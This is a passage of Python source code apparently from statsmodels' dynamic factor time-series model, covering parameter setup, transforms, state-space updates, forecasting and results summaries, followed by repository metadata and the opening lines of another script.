self._params_factor_transition, offset = (
_slice('factor_transition', offset))
self._params_error_transition, offset = (
_slice('error_transition', offset))
def _initialize_loadings(self):
# Initialize the parameters
self.parameters['factor_loadings'] = self.k_endog * self.k_factors
# Setup fixed components of state space matrices
if self.error_order > 0:
start = self._factor_order
end = self._factor_order + self.k_endog
self.ssm['design', :, start:end] = np.eye(self.k_endog)
# Setup indices of state space matrices
self._idx_loadings = np.s_['design', :, :self.k_factors]
def _initialize_exog(self):
# Initialize the parameters
self.parameters['exog'] = self.k_exog * self.k_endog
# If we have exog effects, then the obs intercept needs to be
# time-varying
if self.k_exog > 0:
self.ssm['obs_intercept'] = np.zeros((self.k_endog, self.nobs))
# Setup indices of state space matrices
self._idx_exog = np.s_['obs_intercept', :self.k_endog, :]
def _initialize_error_cov(self):
if self.error_cov_type == 'scalar':
self._initialize_error_cov_diagonal(scalar=True)
elif self.error_cov_type == 'diagonal':
self._initialize_error_cov_diagonal(scalar=False)
elif self.error_cov_type == 'unstructured':
self._initialize_error_cov_unstructured()
def _initialize_error_cov_diagonal(self, scalar=False):
# Initialize the parameters
self.parameters['error_cov'] = 1 if scalar else self.k_endog
# Setup fixed components of state space matrices
# Setup indices of state space matrices
k_endog = self.k_endog
k_factors = self.k_factors
idx = np.diag_indices(k_endog)
if self.error_order > 0:
matrix = 'state_cov'
idx = (idx[0] + k_factors, idx[1] + k_factors)
else:
matrix = 'obs_cov'
self._idx_error_cov = (matrix,) + idx
def _initialize_error_cov_unstructured(self):
# Initialize the parameters
k_endog = self.k_endog
self.parameters['error_cov'] = int(k_endog * (k_endog + 1) / 2)
# Setup fixed components of state space matrices
# Setup indices of state space matrices
self._idx_lower_error_cov = np.tril_indices(self.k_endog)
if self.error_order > 0:
start = self.k_factors
end = self.k_factors + self.k_endog
self._idx_error_cov = (
np.s_['state_cov', start:end, start:end])
else:
self._idx_error_cov = np.s_['obs_cov', :, :]
def _initialize_factor_transition(self):
order = self.factor_order * self.k_factors
k_factors = self.k_factors
# Initialize the parameters
self.parameters['factor_transition'] = (
self.factor_order * self.k_factors**2)
# Setup fixed components of state space matrices
# VAR(p) for factor transition
if self.k_factors > 0:
if self.factor_order > 0:
self.ssm['transition', k_factors:order, :order - k_factors] = (
np.eye(order - k_factors))
self.ssm['selection', :k_factors, :k_factors] = np.eye(k_factors)
# Identification requires constraining the state covariance to an
# identity matrix
self.ssm['state_cov', :k_factors, :k_factors] = np.eye(k_factors)
# Setup indices of state space matrices
self._idx_factor_transition = np.s_['transition', :k_factors, :order]
def _initialize_error_transition(self):
# Initialize the appropriate situation
if self.error_order == 0:
self._initialize_error_transition_white_noise()
else:
# Generic setup fixed components of state space matrices
# VAR(q) for error transition
# (in the individual AR case, we still have the VAR(q) companion
# matrix structure, but force the coefficient matrices to be
# diagonal)
k_endog = self.k_endog
k_factors = self.k_factors
_factor_order = self._factor_order
_error_order = self._error_order
_slice = np.s_['selection',
_factor_order:_factor_order + k_endog,
k_factors:k_factors + k_endog]
self.ssm[_slice] = np.eye(k_endog)
_slice = np.s_[
'transition',
_factor_order + k_endog:_factor_order + _error_order,
_factor_order:_factor_order + _error_order - k_endog]
self.ssm[_slice] = np.eye(_error_order - k_endog)
# Now specialized setups
if self.error_var:
self._initialize_error_transition_var()
else:
self._initialize_error_transition_individual()
def _initialize_error_transition_white_noise(self):
# Initialize the parameters
self.parameters['error_transition'] = 0
# No fixed components of state space matrices
# Setup indices of state space matrices (just an empty slice)
self._idx_error_transition = np.s_['transition', 0:0, 0:0]
def _initialize_error_transition_var(self):
k_endog = self.k_endog
_factor_order = self._factor_order
_error_order = self._error_order
# Initialize the parameters
self.parameters['error_transition'] = _error_order * k_endog
# Fixed components already setup above
# Setup indices of state space matrices
# Here we want to set all of the elements of the coefficient matrices,
# the same as in a VAR specification
self._idx_error_transition = np.s_[
'transition',
_factor_order:_factor_order + k_endog,
_factor_order:_factor_order + _error_order]
def _initialize_error_transition_individual(self):
k_endog = self.k_endog
_factor_order = self._factor_order
_error_order = self._error_order
# Initialize the parameters
self.parameters['error_transition'] = _error_order
# Fixed components already setup above
# Setup indices of state space matrices
# Here we want to set only the diagonal elements of the coefficient
# matrices, and we want to set them in order by equation, not by
# matrix (i.e. set the first element of the first matrix's diagonal,
# then set the first element of the second matrix's diagonal, then...)
# The basic setup is a tiled list of diagonal indices, one for each
# coefficient matrix
idx = np.tile(np.diag_indices(k_endog), self.error_order)
# Now we need to shift the rows down to the correct location
row_shift = self._factor_order
# And we need to shift the columns in an increasing way
col_inc = self._factor_order + np.repeat(
[i * k_endog for i in range(self.error_order)], k_endog)
idx[0] += row_shift
idx[1] += col_inc
# Make a copy (without the row shift) so that we can easily get the
# diagonal parameters back out of a generic coefficients matrix array
idx_diag = idx.copy()
idx_diag[0] -= row_shift
idx_diag[1] -= self._factor_order
idx_diag = idx_diag[:, np.lexsort((idx_diag[1], idx_diag[0]))]
self._idx_error_diag = (idx_diag[0], idx_diag[1])
# Finally, we want to fill the entries in in the correct order, which
# is to say we want to fill in lexicographically, first by row then by
# column
idx = idx[:, np.lexsort((idx[1], idx[0]))]
self._idx_error_transition = np.s_['transition', idx[0], idx[1]]
def filter(self, params, **kwargs):
kwargs.setdefault('results_class', DynamicFactorResults)
kwargs.setdefault('results_wrapper_class', DynamicFactorResultsWrapper)
return super(DynamicFactor, self).filter(params, **kwargs)
def smooth(self, params, **kwargs):
kwargs.setdefault('results_class', DynamicFactorResults)
kwargs.setdefault('results_wrapper_class', DynamicFactorResultsWrapper)
return super(DynamicFactor, self).smooth(params, **kwargs)
@property
def start_params(self):
params = np.zeros(self.k_params, dtype=np.float64)
endog = self.endog.copy()
# 1. Factor loadings (estimated via PCA)
if self.k_factors > 0:
# Use principal components + OLS as starting values
res_pca = PCA(endog, ncomp=self.k_factors)
mod_ols = OLS(endog, res_pca.factors)
res_ols = mod_ols.fit()
# Using OLS params for the loadings tends to gives higher starting
# log-likelihood.
params[self._params_loadings] = res_ols.params.T.ravel()
# params[self._params_loadings] = res_pca.loadings.ravel()
# However, using res_ols.resid tends to causes non-invertible
# starting VAR coefficients for error VARs
# endog = res_ols.resid
endog = endog - np.dot(res_pca.factors, res_pca.loadings.T)
# 2. Exog (OLS on residuals)
if self.k_exog > 0:
mod_ols = OLS(endog, exog=self.exog)
res_ols = mod_ols.fit()
# In the form: beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
params[self._params_exog] = res_ols.params.T.ravel()
endog = res_ols.resid
# 3. Factors (VAR on res_pca.factors)
stationary = True
if self.k_factors > 1 and self.factor_order > 0:
# 3a. VAR transition (OLS on factors estimated via PCA)
mod_factors = VAR(res_pca.factors)
res_factors = mod_factors.fit(maxlags=self.factor_order, ic=None,
trend='nc')
# Save the parameters
params[self._params_factor_transition] = (
res_factors.params.T.ravel())
# Test for stationarity
coefficient_matrices = (
params[self._params_factor_transition].reshape(
self.k_factors * self.factor_order, self.k_factors
).T
).reshape(self.k_factors, self.k_factors, self.factor_order).T
stationary = is_invertible([1] + list(-coefficient_matrices))
elif self.k_factors > 0 and self.factor_order > 0:
# 3b. AR transition
Y = res_pca.factors[self.factor_order:]
X = lagmat(res_pca.factors, self.factor_order, trim='both')
params_ar = np.linalg.pinv(X).dot(Y)
stationary = is_invertible(np.r_[1, -params_ar.squeeze()])
params[self._params_factor_transition] = params_ar[:, 0]
# Check for stationarity
if not stationary and self.enforce_stationarity:
raise ValueError('Non-stationary starting autoregressive'
' parameters found with `enforce_stationarity`'
' set to True.')
# 4. Errors
if self.error_order == 0:
error_params = []
if self.error_cov_type == 'scalar':
params[self._params_error_cov] = endog.var(axis=0).mean()
elif self.error_cov_type == 'diagonal':
params[self._params_error_cov] = endog.var(axis=0)
elif self.error_cov_type == 'unstructured':
cov_factor = np.diag(endog.std(axis=0))
params[self._params_error_cov] = (
cov_factor[self._idx_lower_error_cov].ravel())
else:
mod_errors = VAR(endog)
res_errors = mod_errors.fit(maxlags=self.error_order, ic=None,
trend='nc')
# Test for stationarity
coefficient_matrices = (
np.array(res_errors.params.T).ravel().reshape(
self.k_endog * self.error_order, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.error_order).T
stationary = is_invertible([1] + list(-coefficient_matrices))
if not stationary and self.enforce_stationarity:
raise ValueError('Non-stationary starting error autoregressive'
' parameters found with'
' `enforce_stationarity` set to True.')
# Get the error autoregressive parameters
if self.error_var:
params[self._params_error_transition] = (
np.array(res_errors.params.T).ravel())
else:
# In the case of individual autoregressions, extract just the
# diagonal elements
params[self._params_error_transition] = (
res_errors.params.T[self._idx_error_diag])
# Get the error covariance parameters
if self.error_cov_type == 'scalar':
params[self._params_error_cov] = (
res_errors.sigma_u.diagonal().mean())
elif self.error_cov_type == 'diagonal':
params[self._params_error_cov] = res_errors.sigma_u.diagonal()
elif self.error_cov_type == 'unstructured':
try:
cov_factor = np.linalg.cholesky(res_errors.sigma_u)
except np.linalg.LinAlgError:
cov_factor = np.eye(res_errors.sigma_u.shape[0]) * (
res_errors.sigma_u.diagonal().mean()**0.5)
cov_factor = np.eye(res_errors.sigma_u.shape[0]) * (
res_errors.sigma_u.diagonal().mean()**0.5)
params[self._params_error_cov] = (
cov_factor[self._idx_lower_error_cov].ravel())
return params
@property
def param_names(self):
param_names = []
endog_names = self.endog_names
# 1. Factor loadings
param_names += [
'loading.f%d.%s' % (j+1, endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_factors)
]
# 2. Exog
# Recall these are in the form: beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
param_names += [
'beta.%s.%s' % (self.exog_names[j], endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_exog)
]
# 3. Error covariances
if self.error_cov_type == 'scalar':
param_names += ['sigma2']
elif self.error_cov_type == 'diagonal':
param_names += [
'sigma2.%s' % endog_names[i]
for i in range(self.k_endog)
]
elif self.error_cov_type == 'unstructured':
param_names += [
('sqrt.var.%s' % endog_names[i] if i == j else
'sqrt.cov.%s.%s' % (endog_names[j], endog_names[i]))
for i in range(self.k_endog)
for j in range(i+1)
]
# 4. Factor transition VAR
param_names += [
'L%d.f%d.f%d' % (i+1, k+1, j+1)
for j in range(self.k_factors)
for i in range(self.factor_order)
for k in range(self.k_factors)
]
# 5. Error transition VAR
if self.error_var:
param_names += [
'L%d.e(%s).e(%s)' % (i+1, endog_names[k], endog_names[j])
for j in range(self.k_endog)
for i in range(self.error_order)
for k in range(self.k_endog)
]
else:
param_names += [
'L%d.e(%s).e(%s)' % (i+1, endog_names[j], endog_names[j])
for j in range(self.k_endog)
for i in range(self.error_order)
]
return param_names
def transform_params(self, unconstrained):
"""
Transform unconstrained parameters used by the optimizer to constrained
parameters used in likelihood evaluation
Parameters
----------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer, to be
transformed.
Returns
-------
constrained : array_like
Array of constrained parameters which may be used in likelihood
evalation.
Notes
-----
Constrains the factor transition to be stationary and variances to be
positive.
"""
unconstrained = np.array(unconstrained, ndmin=1)
dtype = unconstrained.dtype
constrained = np.zeros(unconstrained.shape, dtype=dtype)
# 1. Factor loadings
# The factor loadings do not need to be adjusted
constrained[self._params_loadings] = (
unconstrained[self._params_loadings])
# 2. Exog
# The regression coefficients do not need to be adjusted
constrained[self._params_exog] = (
unconstrained[self._params_exog])
# 3. Error covariances
# If we have variances, force them to be positive
if self.error_cov_type in ['scalar', 'diagonal']:
constrained[self._params_error_cov] = (
unconstrained[self._params_error_cov]**2)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
constrained[self._params_error_cov] = (
unconstrained[self._params_error_cov])
# 4. Factor transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.factor_order > 0:
# Transform the parameters
unconstrained_matrices = (
unconstrained[self._params_factor_transition].reshape(
self.k_factors, self._factor_order))
# This is always an identity matrix, but because the transform
# done prior to update (where the ssm representation matrices
# change), it may be complex
cov = self.ssm[
'state_cov', :self.k_factors, :self.k_factors].real
coefficient_matrices, variance = (
constrain_stationary_multivariate(unconstrained_matrices, cov))
constrained[self._params_factor_transition] = (
coefficient_matrices.ravel())
else:
constrained[self._params_factor_transition] = (
unconstrained[self._params_factor_transition])
# 5. Error transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.error_order > 0:
# Joint VAR specification
if self.error_var:
unconstrained_matrices = (
unconstrained[self._params_error_transition].reshape(
self.k_endog, self._error_order))
start = self.k_factors
end = self.k_factors + self.k_endog
cov = self.ssm['state_cov', start:end, start:end].real
coefficient_matrices, variance = (
constrain_stationary_multivariate(
unconstrained_matrices, cov))
constrained[self._params_error_transition] = (
coefficient_matrices.ravel())
# Separate AR specifications
else:
coefficients = (
unconstrained[self._params_error_transition].copy())
for i in range(self.k_endog):
start = i * self.error_order
end = (i + 1) * self.error_order
coefficients[start:end] = constrain_stationary_univariate(
coefficients[start:end])
constrained[self._params_error_transition] = coefficients
else:
constrained[self._params_error_transition] = (
unconstrained[self._params_error_transition])
return constrained
def untransform_params(self, constrained):
"""
Transform constrained parameters used in likelihood evaluation
to unconstrained parameters used by the optimizer.
Parameters
----------
constrained : array_like
Array of constrained parameters used in likelihood evalution, to be
transformed.
Returns
-------
unconstrained : array_like
Array of unconstrained parameters used by the optimizer.
"""
constrained = np.array(constrained, ndmin=1)
dtype=constrained.dtype
unconstrained = np.zeros(constrained.shape, dtype=dtype)
# 1. Factor loadings
# The factor loadings do not need to be adjusted
unconstrained[self._params_loadings] = (
constrained[self._params_loadings])
# 2. Exog
# The regression coefficients do not need to be adjusted
unconstrained[self._params_exog] = (
constrained[self._params_exog])
# 3. Error covariances
# If we have variances, force them to be positive
if self.error_cov_type in ['scalar', 'diagonal']:
unconstrained[self._params_error_cov] = (
constrained[self._params_error_cov]**0.5)
# Otherwise, nothing needs to be done
elif self.error_cov_type == 'unstructured':
unconstrained[self._params_error_cov] = (
constrained[self._params_error_cov])
# 3. Factor transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.factor_order > 0:
# Transform the parameters
constrained_matrices = (
constrained[self._params_factor_transition].reshape(
self.k_factors, self._factor_order))
cov = self.ssm[
'state_cov', :self.k_factors, :self.k_factors].real
coefficient_matrices, variance = (
unconstrain_stationary_multivariate(
constrained_matrices, cov))
unconstrained[self._params_factor_transition] = (
coefficient_matrices.ravel())
else:
unconstrained[self._params_factor_transition] = (
constrained[self._params_factor_transition])
# 5. Error transition VAR
# VAR transition: optionally force to be stationary
if self.enforce_stationarity and self.error_order > 0:
# Joint VAR specification
if self.error_var:
constrained_matrices = (
constrained[self._params_error_transition].reshape(
self.k_endog, self._error_order))
start = self.k_factors
end = self.k_factors + self.k_endog
cov = self.ssm['state_cov', start:end, start:end].real
coefficient_matrices, variance = (
unconstrain_stationary_multivariate(
constrained_matrices, cov))
unconstrained[self._params_error_transition] = (
coefficient_matrices.ravel())
# Separate AR specifications
else:
coefficients = (
constrained[self._params_error_transition].copy())
for i in range(self.k_endog):
start = i * self.error_order
end = (i + 1) * self.error_order
coefficients[start:end] = (
unconstrain_stationary_univariate(
coefficients[start:end]))
unconstrained[self._params_error_transition] = coefficients
else:
unconstrained[self._params_error_transition] = (
constrained[self._params_error_transition])
return unconstrained
def update(self, params, transformed=True, complex_step=False):
"""
Update the parameters of the model
Updates the representation matrices to fill in the new parameter
values.
Parameters
----------
params : array_like
Array of new parameters.
transformed : boolean, optional
Whether or not `params` is already transformed. If set to False,
`transform_params` is called. Default is True..
Returns
-------
params : array_like
Array of parameters.
Notes
-----
Let `n = k_endog`, `m = k_factors`, and `p = factor_order`. Then the
`params` vector has length
:math:`[n \times m] + [n] + [m^2 \times p]`.
It is expanded in the following way:
- The first :math:`n \times m` parameters fill out the factor loading
matrix, starting from the [0,0] entry and then proceeding along rows.
These parameters are not modified in `transform_params`.
- The next :math:`n` parameters provide variances for the error_cov
errors in the observation equation. They fill in the diagonal of the
observation covariance matrix, and are constrained to be positive by
`transofrm_params`.
- The next :math:`m^2 \times p` parameters are used to create the `p`
coefficient matrices for the vector autoregression describing the
factor transition. They are transformed in `transform_params` to
enforce stationarity of the VAR(p). They are placed so as to make
the transition matrix a companion matrix for the VAR. In particular,
we assume that the first :math:`m^2` parameters fill the first
coefficient matrix (starting at [0,0] and filling along rows), the
second :math:`m^2` parameters fill the second matrix, etc.
"""
params = super(DynamicFactor, self).update(
params, transformed=transformed, complex_step=complex_step)
# 1. Factor loadings
# Update the design / factor loading matrix
self.ssm[self._idx_loadings] = (
params[self._params_loadings].reshape(self.k_endog, self.k_factors)
)
# 2. Exog
if self.k_exog > 0:
exog_params = params[self._params_exog].reshape(
self.k_endog, self.k_exog).T
self.ssm[self._idx_exog] = np.dot(self.exog, exog_params).T
# 3. Error covariances
if self.error_cov_type in ['scalar', 'diagonal']:
self.ssm[self._idx_error_cov] = (
params[self._params_error_cov])
elif self.error_cov_type == 'unstructured':
error_cov_lower = np.zeros((self.k_endog, self.k_endog),
dtype=params.dtype)
error_cov_lower[self._idx_lower_error_cov] = (
params[self._params_error_cov])
self.ssm[self._idx_error_cov] = (
np.dot(error_cov_lower, error_cov_lower.T))
# 4. Factor transition VAR
self.ssm[self._idx_factor_transition] = (
params[self._params_factor_transition].reshape(
self.k_factors, self.factor_order * self.k_factors))
# 5. Error transition VAR
if self.error_var:
self.ssm[self._idx_error_transition] = (
params[self._params_error_transition].reshape(
self.k_endog, self._error_order))
else:
self.ssm[self._idx_error_transition] = (
params[self._params_error_transition])
class DynamicFactorResults(MLEResults):
"""
Class to hold results from fitting an DynamicFactor model.
Parameters
----------
model : DynamicFactor instance
The fitted model instance
Attributes
----------
specification : dictionary
Dictionary including all attributes from the DynamicFactor model
instance.
coefficient_matrices_var : array
Array containing autoregressive lag polynomial coefficient matrices,
ordered from lowest degree to highest.
See Also
--------
statsmodels.tsa.statespace.kalman_filter.FilterResults
statsmodels.tsa.statespace.mlemodel.MLEResults
"""
def __init__(self, model, params, filter_results, cov_type='opg',
**kwargs):
super(DynamicFactorResults, self).__init__(model, params,
filter_results, cov_type,
**kwargs)
self.df_resid = np.inf # attribute required for wald tests
self.specification = Bunch(**{
# Model properties
'k_endog' : self.model.k_endog,
'enforce_stationarity': self.model.enforce_stationarity,
# Factor-related properties
'k_factors': self.model.k_factors,
'factor_order': self.model.factor_order,
# Error-related properties
'error_order': self.model.error_order,
'error_var': self.model.error_var,
'error_cov_type': self.model.error_cov_type,
# Other properties
'k_exog': self.model.k_exog
})
# Polynomials / coefficient matrices
self.coefficient_matrices_var = None
if self.model.factor_order > 0:
ar_params = (
np.array(self.params[self.model._params_factor_transition]))
k_factors = self.model.k_factors
factor_order = self.model.factor_order
self.coefficient_matrices_var = (
ar_params.reshape(k_factors * factor_order, k_factors).T
).reshape(k_factors, k_factors, factor_order).T
self.coefficient_matrices_error = None
if self.model.error_order > 0:
ar_params = (
np.array(self.params[self.model._params_error_transition]))
k_endog = self.model.k_endog
error_order = self.model.error_order
if self.model.error_var:
self.coefficient_matrices_error = (
ar_params.reshape(k_endog * error_order, k_endog).T
).reshape(k_endog, k_endog, error_order).T
else:
mat = np.zeros((k_endog, k_endog * error_order))
mat[self.model._idx_error_diag] = ar_params
self.coefficient_matrices_error = (
mat.T.reshape(error_order, k_endog, k_endog))
@property
def factors(self):
"""
Estimates of unobserved factors
Returns
-------
out: Bunch
Has the following attributes:
- `filtered`: a time series array with the filtered estimate of
the component
- `filtered_cov`: a time series array with the filtered estimate of
the variance/covariance of the component
- `smoothed`: a time series array with the smoothed estimate of
the component
- `smoothed_cov`: a time series array with the smoothed estimate of
the variance/covariance of the component
- `offset`: an integer giving the offset in the state vector where
this component begins
"""
# If present, level is always the first component of the state vector
out = None
spec = self.specification
if spec.k_factors > 0:
offset = 0
end = spec.k_factors
res = self.filter_results
out = Bunch(
filtered=res.filtered_state[offset:end],
filtered_cov=res.filtered_state_cov[offset:end, offset:end],
smoothed=None, smoothed_cov=None,
offset=offset)
if self.smoothed_state is not None:
out.smoothed = self.smoothed_state[offset:end]
if self.smoothed_state_cov is not None:
out.smoothed_cov = (
self.smoothed_state_cov[offset:end, offset:end])
return out
@cache_readonly
def coefficients_of_determination(self):
"""
Coefficients of determination (:math:`R^2`) from regressions of
individual estimated factors on endogenous variables.
Returns
-------
coefficients_of_determination : array
A `k_endog` x `k_factors` array, where
`coefficients_of_determination[i, j]` represents the :math:`R^2`
value from a regression of factor `j` and a constant on endogenous
variable `i`.
Notes
-----
Although it can be difficult to interpret the estimated factor loadings
and factors, it is often helpful to use the cofficients of
determination from univariate regressions to assess the importance of
each factor in explaining the variation in each endogenous variable.
In models with many variables and factors, this can sometimes lend
interpretation to the factors (for example sometimes one factor will
load primarily on real variables and another on nominal variables).
See Also
--------
plot_coefficients_of_determination
"""
from statsmodels.tools import add_constant
spec = self.specification
coefficients = np.zeros((spec.k_endog, spec.k_factors))
which = 'filtered' if self.smoothed_state is None else 'smoothed'
for i in range(spec.k_factors):
exog = add_constant(self.factors[which][i])
for j in range(spec.k_endog):
endog = self.filter_results.endog[j]
coefficients[j, i] = OLS(endog, exog).fit().rsquared
return coefficients
def plot_coefficients_of_determination(self, endog_labels=None,
fig=None, figsize=None):
"""
Plot the coefficients of determination
Parameters
----------
endog_labels : boolean, optional
Whether or not to label the endogenous variables along the x-axis
of the plots. Default is to include labels if there are 5 or fewer
endogenous variables.
fig : Matplotlib Figure instance, optional
If given, subplots are created in this figure instead of in a new
figure. Note that the grid will be created in the provided
figure using `fig.add_subplot()`.
figsize : tuple, optional
If a figure is created, this argument allows specifying a size.
The tuple is (width, height).
Notes
-----
Produces a `k_factors` x 1 plot grid. The `i`th plot shows a bar plot
of the coefficients of determination associated with factor `i`. The
endogenous variables are arranged along the x-axis according to their
position in the `endog` array.
See Also
--------
coefficients_of_determination
"""
from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
_import_mpl()
fig = create_mpl_fig(fig, figsize)
spec = self.specification
# Should we label endogenous variables?
if endog_labels is None:
endog_labels = spec.k_endog <= 5
# Plot the coefficients of determination
coefficients_of_determination = self.coefficients_of_determination
plot_idx = 1
locations = np.arange(spec.k_endog)
for coeffs in coefficients_of_determination.T:
# Create the new axis
ax = fig.add_subplot(spec.k_factors, 1, plot_idx)
ax.set_ylim((0,1))
ax.set(title='Factor %i' % plot_idx, ylabel=r'$R^2$')
bars = ax.bar(locations, coeffs)
if endog_labels:
width = bars[0].get_width()
ax.xaxis.set_ticks(locations + width / 2)
ax.xaxis.set_ticklabels(self.model.endog_names)
else:
ax.set(xlabel='Endogenous variables')
ax.xaxis.set_ticks([])
plot_idx += 1
return fig
def predict(self, start=None, end=None, exog=None, dynamic=False,
**kwargs):
"""
In-sample prediction and out-of-sample forecasting
Parameters
----------
start : int, str, or datetime, optional
Zero-indexed observation number at which to start forecasting, ie.,
the first forecast is start. Can also be a date string to
parse or a datetime type. Default is the the zeroth observation.
end : int, str, or datetime, optional
Zero-indexed observation number at which to end forecasting, ie.,
the first forecast is start. Can also be a date string to
parse or a datetime type. However, if the dates index does not
have a fixed frequency, end must be an integer index if you
want out of sample prediction. Default is the last observation in
the sample.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables if
end is beyond the last observation in the sample.
dynamic : boolean, int, str, or datetime, optional
Integer offset relative to `start` at which to begin dynamic
prediction. Can also be an absolute date string to parse or a
datetime type (these are not interpreted as offsets).
Prior to this observation, true endogenous values will be used for
prediction; starting with this observation and continuing through
the end of prediction, forecasted endogenous values will be used
instead.
**kwargs
Additional arguments may required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
if start is None:
start = 0
# Handle end (e.g. date)
_start = self.model._get_predict_start(start)
_end, _out_of_sample = self.model._get_predict_end(end)
# Handle exogenous parameters
if _out_of_sample and self.model.k_exog > 0:
# Create a new faux VARMAX model for the extended dataset
nobs = self.model.data.orig_endog.shape[0] + _out_of_sample
endog = np.zeros((nobs, self.model.k_endog))
if self.model.k_exog > 0:
if exog is None:
raise ValueError('Out-of-sample forecasting in a model'
' with a regression component requires'
' additional exogenous values via the'
' `exog` argument.')
exog = np.array(exog)
required_exog_shape = (_out_of_sample, self.model.k_exog)
if not exog.shape == required_exog_shape:
raise ValueError('Provided exogenous values are not of the'
' appropriate shape. Required %s, got %s.'
% (str(required_exog_shape),
str(exog.shape)))
exog = np.c_[self.model.data.orig_exog.T, exog.T].T
# TODO replace with init_kwds or specification or similar
model = DynamicFactor(
endog,
k_factors=self.model.k_factors,
factor_order=self.model.factor_order,
exog=exog,
error_order=self.model.error_order,
error_var=self.model.error_var,
error_cov_type=self.model.error_cov_type,
enforce_stationarity=self.model.enforce_stationarity
)
model.update(self.params)
# Set the kwargs with the update time-varying state space
# representation matrices
for name in self.filter_results.shapes.keys():
if name == 'obs':
continue
mat = getattr(model.ssm, name)
if mat.shape[-1] > 1:
if len(mat.shape) == 2:
kwargs[name] = mat[:, -_out_of_sample:]
else:
kwargs[name] = mat[:, :, -_out_of_sample:]
elif self.model.k_exog == 0 and exog is not None:
warn('Exogenous array provided to predict, but additional data not'
' required. `exog` argument ignored.', ValueWarning)
return super(DynamicFactorResults, self).predict(
start=start, end=end, exog=exog, dynamic=dynamic, **kwargs
)
def forecast(self, steps=1, exog=None, **kwargs):
"""
Out-of-sample forecasts
Parameters
----------
steps : int, optional
The number of out of sample forecasts from the end of the
sample. Default is 1.
exog : array_like, optional
If the model includes exogenous regressors, you must provide
exactly enough out-of-sample values for the exogenous variables for
each step forecasted.
**kwargs
Additional arguments may required for forecasting beyond the end
of the sample. See `FilterResults.predict` for more details.
Returns
-------
forecast : array
Array of out of sample forecasts.
"""
return super(DynamicFactorResults, self).forecast(steps, exog=exog,
**kwargs)
def summary(self, alpha=.05, start=None, separate_params=True):
from statsmodels.iolib.summary import summary_params
spec = self.specification
# Create the model name
model_name = []
if spec.k_factors > 0:
if spec.factor_order > 0:
model_type = ('DynamicFactor(factors=%d, order=%d)' %
(spec.k_factors, spec.factor_order))
else:
model_type = 'StaticFactor(factors=%d)' % spec.k_factors
model_name.append(model_type)
if spec.k_exog > 0:
model_name.append('%d regressors' % spec.k_exog)
else:
model_name.append('SUR(%d regressors)' % spec.k_exog)
if spec.error_order > 0:
error_type = 'VAR' if spec.error_var else 'AR'
model_name.append('%s(%d) errors' % (error_type, spec.error_order))
summary = super(DynamicFactorResults, self).summary(
alpha=alpha, start=start, model_name=model_name,
display_params=not separate_params
)
if separate_params:
indices = np.arange(len(self.params))
def make_table(self, mask, title, strip_end=True):
res = (self, self.params[mask], self.bse[mask],
self.zvalues[mask], self.pvalues[mask],
self.conf_int(alpha)[mask])
param_names = [
'.'.join(name.split('.')[:-1]) if strip_end else name
for name in
np.array(self.data.param_names)[mask].tolist()
]
return summary_params(res, yname=None, xname=param_names,
alpha=alpha, use_t=False, title=title)
k_endog = self.model.k_endog
k_exog = self.model.k_exog
k_factors = self.model.k_factors
factor_order = self.model.factor_order
_factor_order = self.model._factor_order
_error_order = self.model._error_order
# Add parameter tables for each endogenous variable
loading_indices = indices[self.model._params_loadings]
loading_masks = []
exog_indices = indices[self.model._params_exog]
exog_masks = []
for i in range(k_endog):
offset = 0
# 1. Factor loadings
# Recall these are in the form:
# 'loading.f1.y1', 'loading.f2.y1', 'loading.f1.y2', ...
loading_mask = (
loading_indices[i * k_factors:(i + 1) * k_factors])
loading_masks.append(loading_mask)
# 2. Exog
# Recall these are in the form:
# beta.x1.y1, beta.x2.y1, beta.x1.y2, ...
exog_mask = exog_indices[i * k_exog:(i + 1) * k_exog]
exog_masks.append(exog_mask)
# Create the table
mask = np.concatenate([loading_mask, exog_mask])
title = "Results for equation %s" % self.model.endog_names[i]
table = make_table(self, mask, title)
summary.tables.append(table)
# Add parameter tables for each factor
factor_indices = indices[self.model._params_factor_transition]
factor_masks = []
if factor_order > 0:
for i in range(k_factors):
start = i * _factor_order
factor_mask = factor_indices[start: start + _factor_order]
factor_masks.append(factor_mask)
# Create the table
title = "Results for factor equation f%d" % (i+1)
table = make_table(self, factor_mask, title)
summary.tables.append(table)
# Add parameter tables for error transitions
error_masks = []
if spec.error_order > 0:
error_indices = indices[self.model._params_error_transition]
for i in range(k_endog):
if spec.error_var:
start = i * _error_order
end = (i + 1) * _error_order
else:
start = i * spec.error_order
end = (i + 1) * spec.error_order
error_mask = error_indices[start:end]
error_masks.append(error_mask)
# Create the table
title = ("Results for error equation e(%s)" %
self.model.endog_names[i])
table = make_table(self, error_mask, title)
summary.tables.append(table)
# Error covariance terms
error_cov_mask = indices[self.model._params_error_cov]
table = make_table(self, error_cov_mask,
"Error covariance matrix", strip_end=False)
summary.tables.append(table)
# Add a table for all other parameters
masks = []
for m in (loading_masks, exog_masks, factor_masks,
error_masks, [error_cov_mask]):
m = np.array(m).flatten()
if len(m) > 0:
masks.append(m)
masks = np.concatenate(masks)
inverse_mask = np.array(list(set(indices).difference(set(masks))))
if len(inverse_mask) > 0:
table = make_table(self, inverse_mask, "Other parameters",
strip_end=False)
summary.tables.append(table)
return summary
summary.__doc__ = MLEResults.summary.__doc__
class DynamicFactorResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(DynamicFactorResultsWrapper, DynamicFactorResults)
|
phobson/statsmodels
|
statsmodels/tsa/statespace/dynamic_factor.py
|
Python
|
bsd-3-clause
| 57,954
|
#!/usr/bin/env python3
import os
import sys
thispath = os.path.dirname(os.path.realpath(__file__))
